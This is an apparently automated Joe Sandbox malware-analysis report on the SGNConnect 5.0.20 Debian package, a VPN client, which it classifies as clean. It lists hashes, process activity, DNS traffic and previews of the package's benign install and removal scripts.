Joe Sandbox Cloud Basic Analysis Report
Edit tour

Linux Analysis Report
SGNConnect_v5.0.20.deb

Overview

General Information

Sample name:SGNConnect_v5.0.20.deb
Analysis ID:1655141
MD5:8aa66ae2a690b14f05dcd0289714e99d
SHA1:32a4113918a775b59bc2273fc11c48bc62272e89
SHA256:7383858f6f991035ec2a43e70af6e103dc6bfc6e06c62e1d1474d638c8fb4867
Infos:

Detection

Score:2
Range:0 - 100

Signatures

Creates hidden files and/or directories
Executes the "rm" command used to delete files or directories
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1655141
Start date and time:2025-04-03 01:20:40 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 21s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:SGNConnect_v5.0.20.deb
Detection:CLEAN
Classification:clean2.linDEB@0/6@2/0

Runtime Messages

Command:xdg-open "/tmp/SGNConnect_v5.0.20.deb"
PID:5434
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Process Tree

  • system is lnxubuntu20
  • exo-open (PID: 5446, Parent: 5434, MD5: 60a307a6a6325e2034eb5cc56bff1abd) Arguments: exo-open /tmp/SGNConnect_v5.0.20.deb
    • exo-open New Fork (PID: 5450, Parent: 5446)
    • dbus-launch (PID: 5450, Parent: 5446, MD5: 0b22a45154a51c6121bb1d208d8ab203) Arguments: dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
    • exo-open New Fork (PID: 5452, Parent: 5446)
      • exo-open New Fork (PID: 5453, Parent: 5452)
      • sh (PID: 5453, Parent: 2935, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh engrampa /tmp/SGNConnect_v5.0.20.deb
      • engrampa (PID: 5453, Parent: 2935, MD5: 39fede466e21a42b973e73b62cc7fc09) Arguments: engrampa /tmp/SGNConnect_v5.0.20.deb
        • engrampa New Fork (PID: 5456, Parent: 5453)
        • dbus-launch (PID: 5456, Parent: 5453, MD5: 0b22a45154a51c6121bb1d208d8ab203) Arguments: dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
        • engrampa New Fork (PID: 5464, Parent: 5453)
        • dpkg-deb (PID: 5464, Parent: 5453, MD5: 138cc2b338ff91da07bf7ad1ba786d25) Arguments: dpkg-deb -I /tmp/SGNConnect_v5.0.20.deb
          • dpkg-deb New Fork (PID: 5465, Parent: 5464)
          • dpkg-deb New Fork (PID: 5466, Parent: 5464)
          • dpkg-deb New Fork (PID: 5467, Parent: 5464)
          • tar (PID: 5467, Parent: 5464, MD5: 586e1b7caf47a43f5be28968dd4a7329) Arguments: tar -x -m -f - --warning=no-timestamp
          • dpkg-deb New Fork (PID: 5468, Parent: 5464)
          • rm (PID: 5468, Parent: 5464, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf -- /tmp/dpkg-deb.7lBi6l
        • engrampa New Fork (PID: 5469, Parent: 5453)
        • dpkg-deb (PID: 5469, Parent: 5453, MD5: 138cc2b338ff91da07bf7ad1ba786d25) Arguments: dpkg-deb -c /tmp/SGNConnect_v5.0.20.deb
          • dpkg-deb New Fork (PID: 5470, Parent: 5469)
          • dpkg-deb New Fork (PID: 5471, Parent: 5469)
          • dpkg-deb New Fork (PID: 5472, Parent: 5469)
          • tar (PID: 5472, Parent: 5469, MD5: 586e1b7caf47a43f5be28968dd4a7329) Arguments: tar -tv -f - --warning=no-timestamp
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • Networking
  • System Summary
  • Persistence and Installation Behavior
  • Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: classification engineClassification label: clean2.linDEB@0/6@2/0
Source: /usr/bin/exo-open (PID: 5446)Directory: /root/.Xdefaults-galassiaJump to behavior
Source: /usr/bin/exo-open (PID: 5446)Directory: /root/.cacheJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /root/.Xdefaults-galassiaJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/local/share/fonts/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /root/.local/share/fonts/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /root/.fonts/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/X11/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/type1/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/X11/misc/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/X11/util/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/cmap/adobe-cns1/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/cmap/adobe-gb1/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/cmap/adobe-japan1/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/cmap/adobe-japan2/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/cmap/adobe-korea1/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/opentype/malayalam/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/opentype/mathjax/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/opentype/noto/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/opentype/urw-base35/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/Gargi/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/Gubbi/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/Nakula/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/Navilu/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/Sahadeva/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/Sarai/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/abyssinica/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/ancient-scripts/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/dejavu/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/droid/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/freefont/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/kacst/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/kacst-one/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lao/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lato/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/liberation/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/liberation2/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-assamese/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-bengali/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-devanagari/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-gujarati/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-kannada/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-malayalam/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-oriya/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-punjabi/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-tamil/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-tamil-classical/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/lohit-telugu/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/malayalam/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/noto/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/openoffice/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/padauk/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/pagul/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/samyak/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/samyak-fonts/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/sinhala/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/tibetan-machine/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/tlwg/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/ttf-khmeros-core/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/truetype/ubuntu/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/type1/urw-base35/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /usr/share/fonts/X11/encodings/large/.uuidJump to behavior
Source: /usr/bin/engrampa (PID: 5453)Directory: /root/.cacheJump to behavior
Source: /usr/bin/tar (PID: 5467)Directory: /tmp/dpkg-deb.7lBi6l/.Jump to behavior
Source: /usr/bin/dpkg-deb (PID: 5468)Rm executable: /usr/bin/rm -> rm -rf -- /tmp/dpkg-deb.7lBi6lJump to behavior
Source: /usr/bin/tar (PID: 5467)File: /tmp/dpkg-deb.7lBi6l/postinst (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/tar (PID: 5467)File: /tmp/dpkg-deb.7lBi6l/prerm (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/tar (PID: 5467)File: /tmp/dpkg-deb.7lBi6l/. (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/tar (PID: 5467)Writes shell script file to disk with an unusual file extension: /tmp/dpkg-deb.7lBi6l/postinstJump to dropped file
Source: /usr/bin/tar (PID: 5467)Writes shell script file to disk with an unusual file extension: /tmp/dpkg-deb.7lBi6l/prermJump to dropped file
Source: /usr/bin/exo-open (PID: 5446)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/dbus-launch (PID: 5450)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/engrampa (PID: 5453)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/dbus-launch (PID: 5456)Queries kernel information via 'uname': Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
File and Directory Permissions Modification		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Non-Application Layer Protocol		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Hidden Files and Directories		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1655141 Sample: SGNConnect_v5.0.20.deb Startdate: 03/04/2025 Architecture: LINUX Score: 2 42 daisy.ubuntu.com 2->42 9 exo-open 2->9         started        process3 process4 11 exo-open 9->11         started        13 exo-open dbus-launch 9->13         started        process5 15 exo-open sh engrampa 11->15         started        process6 17 engrampa dpkg-deb 15->17         started        19 engrampa dpkg-deb 15->19         started        21 engrampa dbus-launch 15->21         started        process7 23 dpkg-deb tar 17->23         started        26 dpkg-deb rm 17->26         started        28 dpkg-deb 17->28         started        30 dpkg-deb 17->30         started        32 dpkg-deb tar 19->32         started        34 dpkg-deb 19->34         started        36 dpkg-deb 19->36         started        file8 38 /tmp/dpkg-deb.7lBi6l/prerm, POSIX 23->38 dropped 40 /tmp/dpkg-deb.7lBi6l/postinst, POSIX 23->40 dropped

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    		high

    World Map of Contacted IPs

    No contacted IP infos

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    daisy.ubuntu.comxd.ppc.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.arm6.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    .i.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.25
    xd.x86_64.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.arm.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    xd.m68k.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    xd.mips.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.arm6.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.arm6.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    xd.x86.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    Process:/usr/bin/engrampa
    File Type:data
    Category:dropped
    Size (bytes):2
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:C4103F122D27677C9DB144CAE1394A66
    SHA1:1489F923C4DCA729178B3E3233458550D8DDDF29
    SHA-256:96A296D224F285C67BEE93C30F8A309157F0DAA35DC5B87E410B78630A09CFC7
    SHA-512:5EA71DC6D0B4F57BF39AADD07C208C35F06CD2BAC5FDE210397F70DE11D439C62EC1CDF3183758865FD387FCEA0BADA2F6C37A4A17851DD1D78FEFE6F204EE54
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:..
    Process:/usr/bin/tar
    File Type:ASCII text
    Category:dropped
    Size (bytes):53
    Entropy (8bit):4.357558369976583
    Encrypted:false
    SSDEEP:3:MteoiECAHRayqmr8SLv:roiUHIyqob
    MD5:DBFF7A958BC0F534D6008D58AF2BF3DE
    SHA1:9C8F94945CCDB4EF6A3AC649503D132A23A1CD6D
    SHA-256:DD9BC6ABAFE926437022DEEC8205C69C22503F743674980E5DCDA7934BF9B2AE
    SHA-512:75CD4EDC43BCDE7978A12EFDA690670DA77AFE2A99BD4FBF99AE26F3294A69215F9A515DEC1D25F6211189F48892482A45DF4EEE444E4471FFAAF1E9A20AB53A
    Malicious:false
    Reputation:low
    Preview:/etc/NetworkManager/dispatcher.d/10-check-dns-domain.
    Process:/usr/bin/tar
    File Type:ASCII text, with very long lines (477)
    Category:dropped
    Size (bytes):784
    Entropy (8bit):5.142130985735185
    Encrypted:false
    SSDEEP:24:/XgnLzKHJW93wzIuu+9Q3BWiHxiK5MCXLjRMCX:/wnLzKH09IIYQRWIDMq/RMW
    MD5:F5D2940D7DF43F1304AC4842ED2A7E64
    SHA1:8334D3BAD104365B3A1BC9027909A3E76050853E
    SHA-256:C207A34F849A6674667DA8A4A69F8BDE883FD77F1689E4A099469E12F340CCE4
    SHA-512:381CA5ED9CD4F6043C2CCF543D4DB17AD53C506CFAD024FA2E38F352252C4AAABCAA3DA85612659CF72FD06C541A459F6E266C8AAA019BFED3B04E458DD12CBF
    Malicious:false
    Reputation:low
    Preview:Package: sgnconnect.Version: 5.0.20.Architecture: amd64.Maintainer: Todyl Support <support@todyl.com>.Installed-Size: 207012.Depends: zip, ca-certificates, libasio-dev, libnss3-tools, liblzo2-2, liblz4-1, libxcb-xinerama0, net-tools, openvpn, openvpn-systemd-resolved, qt5-image-formats-plugins, libc6 (>= 2.30), libgcc-s1 (>= 3.0), libqt5core5a (>= 5.15.1), libqt5gui5 (>= 5.8.0) | libqt5gui5-gles (>= 5.8.0), libqt5network5 (>= 5.0.2), libqt5svg5 (>= 5.6.0~beta), libqt5webenginecore5 (>= 5.7.1), libqt5webenginewidgets5 (>= 5.7.1), libqt5widgets5 (>= 5.2.0), libqt5xml5 (>= 5.0.2), libstdc++6 (>= 9).Section: net.Priority: extra.Description: Establish connections to the Secure Global Network (SGN). A lightweight client used to connect devices to the Secure Global Network (SGN).
    Process:/usr/bin/tar
    File Type:ASCII text
    Category:dropped
    Size (bytes):9491
    Entropy (8bit):5.002582166122907
    Encrypted:false
    SSDEEP:192:/2h3DcaBiy2mcPLDQP/XzK7vEgpHwW+BXy:YYaktmcjDQPPm7ZKw
    MD5:D51256D6333FE68FF48630ADE972BEDD
    SHA1:3ACEB50CD777FF9D3886A13BA8AB5AE1B33BCC65
    SHA-256:9A4645DFE628BBA9E61406507CB9E200E7165C7BA38EE4F3762872A5715CD8A6
    SHA-512:D715B8222B2DE4E978CA11C71A59AA9992AE6564CCF6E8E181D0B972CC4EB42C36166B29803A8728D0D0589F58828C9F56706725DC43D18F5B787814BC648D20
    Malicious:false
    Reputation:low
    Preview:94043448bd393e4d0b1947d756de3bdd lib/systemd/system/sgnauditbeat.service.ac18bd1469174ee983393b0b49e97437 lib/systemd/system/sgncore.service.5d1e68542677bd2e8a8110464f571016 lib/systemd/system/sgnfilebeat.service.2cb43ad2abb9aa4e5c32c76241a3c6d5 lib/systemd/system/sgnupdater.service.df254e4e7dbe9d5b929bd1b8edeea634 lib/systemd/system/sgnwatchdog.service.413c5e125d09262420baeacba1f6041a opt/sgnconnect/consoletodyl.10bb737fccc73f6fd8f5eaed5e28b38d opt/sgnconnect/kibana/7/dashboard/749203a0-67b1-11ea-a76f-bf44814e437d.json.007c55ee27834a02eb09fe200dee1e83 opt/sgnconnect/kibana/7/dashboard/Coredns-Overview-Dashboard.json.56c6633ee4a2ea648fa383b903efd2c7 opt/sgnconnect/kibana/7/dashboard/Filebeat-Cisco-ASA.json.69224cdd99c56d32966a38ed385acc3e opt/sgnconnect/kibana/7/dashboard/Filebeat-Envoyproxy-Overview.json.ac871e097e18ee42335a72640aab5bd7 opt/sgnconnect/kibana/7/dashboard/Filebeat-IBMMQ-Overview.json.d7b0043eae5f7cfc3efebe81da14eb7e opt/sgnconnect/kibana/7/dashboard/Filebeat
    Process:/usr/bin/tar
    File Type:POSIX shell script, ASCII text executable
    Category:dropped
    Size (bytes):502
    Entropy (8bit):4.441739966294269
    Encrypted:false
    SSDEEP:12:GYQ+wPB4W2WxKTKl21lPaZgTKgUuPGMGkTKR:2fOGADlo8BTO
    MD5:392FBD5C7014D16B011CB18891F71341
    SHA1:F3B5DC6377DAC51E995FBE0D0FCB2C079EFBE909
    SHA-256:AAB2A0C11369779D7A645862D72A24C24A5D97957566247726F10711C03D5C73
    SHA-512:CC33097AB6B45B71646271DEC3470191DB9027E96A22CAD12A9AB76413A8BE9A11BFD5EE0E135A434C98F8A25B2F32B6DF2A6BCD08F6F9FB32B7B52D64A32BE1
    Malicious:false
    Reputation:low
    Preview:#!/bin/sh..# fix permissions.chown -R root:root /opt/sgnconnect/sgnconnect..# Create folders for core dumps.mkdir -p /opt/sgnconnect/crashes/sgncore.mkdir -p /opt/sgnconnect/crashes/sgnupdater.mkdir -p /opt/sgnconnect/crashes/sgnwatchdog.mkdir -p /opt/sgnconnect/crashes/sgnconnect..systemctl enable sgncore.service.systemctl enable sgnupdater.service.systemctl enable sgnwatchdog.service..systemctl start sgncore.service.systemctl start sgnupdater.service.systemctl start sgnwatchdog.service...exit 0.
    Process:/usr/bin/tar
    File Type:POSIX shell script, ASCII text executable
    Category:dropped
    Size (bytes):566
    Entropy (8bit):4.492250677892201
    Encrypted:false
    SSDEEP:12:ioiFGBQL7wAFv4bGDTKYggTKoN/pfzfqrFeFFeFIPt74H:NiFeQL7Dv4SnZg89N/pfzfC4FaIPCH
    MD5:B3AE4E5A5726BBF1DCA23740AFDF094E
    SHA1:510EE2BA7FEEF5B07248517438A6D310CA523CAA
    SHA-256:663218D5163743FCD49766EAB4372891ACD7353AAC3A8E227DAD60B1E7B078CB
    SHA-512:C0B254DCDCEB586D5BA65D0DF2BBF4AA1E2A93703348B45942D9553043C44583F2291EF1B7B6D3E5566B769B5E16A9EF15A35A933AB9EB91E8E0FEAF98B6C394
    Malicious:false
    Reputation:low
    Preview:#!/bin/sh..if [ "$1" = "upgrade" ]; then.# Do nothing for upgrades. exit 0.else. # Stop any gui processes. killall sgnconnect.. # Stop services but only if not upgrading. systemctl stop sgnwatchdog.service. systemctl disable sgnwatchdog.service. systemctl stop sgncore.service. systemctl disable sgncore.service. systemctl stop sgnupdater.service. systemctl disable sgnupdater.service.. /opt/sgnconnect/sgncore --cleanup.. killall sgnauditbeat. killall sgnfilebeat.. rm /opt/sgnconnect/data/SGN/SGN\ Connect.ini.fi...exit 0.

    Static File Info

    General

    File type:Debian binary package (format 2.0), with control.tar.xz, data compression xz
    Entropy (8bit):7.999996207675499
    TrID:
    • Debian Linux Package (24024/1) 100.00%
    File name:SGNConnect_v5.0.20.deb
    File size:49'183'836 bytes
    MD5:8aa66ae2a690b14f05dcd0289714e99d
    SHA1:32a4113918a775b59bc2273fc11c48bc62272e89
    SHA256:7383858f6f991035ec2a43e70af6e103dc6bfc6e06c62e1d1474d638c8fb4867
    SHA512:4b5bb1a9626deee12cce7308a142af72e977c176ab4a973b4fc9bf70470ad7541920d9601b620e69472257659f84ea18698e67f3b9e5b0e6fca0a661d37f8677
    SSDEEP:786432:V/2Jb+Vupk2WAUD5Sxt0zPNLaPodwSj9MppcVcX4xd7/8JcZmsYaf3RebKVniIdp:V/oQupXODUx+zPN2AwSjIyJxd7UaX3RJ
    TLSH:23B73336BD3D473D23EE5812242EC91E9A90E749E2ADBC497664F509B3FC2342F57221
    File Content Preview:!<arch>.debian-binary 1633376706 0 0 100644 4 `.2.0.control.tar.xz 1633376706 0 0 100644 4028 `..7zXZ......F.......!.............O..q].....}....J>y...&.^....5...6..=../0.IDBgS$.(35....].y.........x...:..j.#..}.....T;<Mr

    Network Behavior

    Download Network PCAP: filteredfull

    TimestampSource PortDest PortSource IPDest IP
    Apr 3, 2025 01:24:06.645951033 CEST5524853192.168.2.131.1.1.1
    Apr 3, 2025 01:24:06.646007061 CEST4596153192.168.2.131.1.1.1
    Apr 3, 2025 01:24:06.745147943 CEST53459611.1.1.1192.168.2.13
    Apr 3, 2025 01:24:06.746330976 CEST53552481.1.1.1192.168.2.13

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Apr 3, 2025 01:24:06.645951033 CEST192.168.2.131.1.1.10x46b6Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
    Apr 3, 2025 01:24:06.646007061 CEST192.168.2.131.1.1.10x9b02Standard query (0)daisy.ubuntu.com28IN (0x0001)false

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Apr 3, 2025 01:24:06.746330976 CEST1.1.1.1192.168.2.130x46b6No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
    Apr 3, 2025 01:24:06.746330976 CEST1.1.1.1192.168.2.130x46b6No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

    System Behavior

    General

    Start time (UTC):23:21:24
    Start date (UTC):02/04/2025
    Path:/usr/bin/exo-open
    Arguments:exo-open /tmp/SGNConnect_v5.0.20.deb
    File size:27264 bytes
    MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

    File Activities

    Process Activities

    System Activities

    Network Activities


    General

    Start time (UTC):23:21:24
    Start date (UTC):02/04/2025
    Path:/usr/bin/exo-open
    Arguments:-
    File size:27264 bytes
    MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/dbus-launch
    Arguments:dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
    File size:34960 bytes
    MD5 hash:0b22a45154a51c6121bb1d208d8ab203

    File Activities

    System Activities

    Network Activities


    General

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/exo-open
    Arguments:-
    File size:27264 bytes
    MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

    Process Activities


    General

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/exo-open
    Arguments:-
    File size:27264 bytes
    MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/bin/sh
    Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh engrampa /tmp/SGNConnect_v5.0.20.deb
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    File Activities

    Process Activities


    General

    Start time (UTC):23:21:25
    Start date (UTC):02/04/2025
    Path:/usr/bin/engrampa
    Arguments:engrampa /tmp/SGNConnect_v5.0.20.deb
    File size:492616 bytes
